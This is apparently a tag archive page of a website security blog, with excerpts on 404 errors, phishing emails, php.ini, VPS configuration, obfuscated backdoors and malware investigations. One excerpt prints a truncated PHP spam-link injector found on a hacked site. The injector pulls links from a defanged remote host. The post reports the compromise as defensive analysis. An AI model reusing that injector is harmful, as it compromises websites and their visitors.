Conducting an external website scan for indicators of compromise is one of the easiest ways to identify security issues. While remote scanners may not provide as comprehensive of a scan as server-side scanners, they allow users to instantly identify malicious code and detect security issues on their website without installing any software or applications. Our […]
Tag Archives: Website Security
What is Error 404? How to Fix & Troubleshoot 404’s On Your Site
The notorious Error 404 Not Found stands firmly at the top of the list of most common website issues. Encountering this HTTP status code indicates that your requested page is nowhere to be found on the server. A 404 Page Not Found error most typically occurs when a page or resource can’t be tracked down […]
Abandoned US Congressional Website Used in Asian Gambling Spam Infection
Website owners and developers tend to buy a lot of domains. With different projects on the go and working with multiple different clients at any given time it can be a challenge to keep track of all your inventory. Sadly, when old websites and domains get forgotten about they can be preyed upon by attackers […]
How to Recognize & Avoid Phishing Emails: A Cautionary Tale
We’ve all received spam and phishing emails — our inboxes are often full of them. They let us know that our package is being delivered (even when we haven’t ordered anything), provide details on our “recent” tax filing (that was completed months ago), and encourage us to act fast and enter our credit card — […]
Massive Google Colaboratory Abuse: Gambling and Subscription Scam
This investigation started with a small and quite simple piece of PHP malware found on a hacked website. We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file: <?php $lines = file(‘https://4ip[.]su/db/links.txt’); shuffle($lines); $data = array_rand($lines, 900); echo ‘ ‘; foreach($data as $value) { $rand = substr(md5(microtime()),rand(0,26),6); echo ‘‘.$rand.’ ‘; […]
Malicious Injection Redirects Traffic via Parked Domain
During a recent investigation, our malware remediation team encountered a variant of a common malware injection that has been active since at least 2017. The malware was found hijacking the website’s traffic, redirecting visitors via a parked third-party domain to generate ad revenue. Investigating obfuscated JavaScript Our investigation revealed the following piece of obfuscated JavaScript […]
What is php.ini? Where It’s Located, How to Edit & Common Directives
The php.ini file, a critical configuration file containing your web server’s PHP settings, is integral to the functioning of your website. Each time PHP initiates, your system hunts down this file to identify directives that will be applied to your site’s scripts. While your PHP initialization file comes pre-configured, there may be instances when you […]
New Guide on Secure VPS Configuration
One of the most common problems that we observe among many of our clients is the persistent threat of cross contamination – that is, malware that spreads from one website to another when they are hosted in the same environment. This is particularly common within cPanel environments when add-on domains are used, or within improperly […]
Remote Code Execution Backdoor Uses Unicode Obfuscation & Non-Standard File Extensions
Readers of this blog will know that attackers are constantly finding new ways to hide their malware and avoid detection; after all, that’s what good malware does best! We have recently observed attackers leveraging both excessive amounts of unicode as well as peculiar includes and file extensions within their WordPress backdoors to conceal their malware […]
Demystifying Website Hacktools: Types, Threats, and Detection
When we think about website malware, visible infection symptoms most often come to mind: unwanted ads or pop-ups, redirects to third party sites, or spam keywords in search results. However, in some cases these very symptoms are the results of hacktools, a diverse and often insidious category of software designed to exploit vulnerabilities and compromise […]
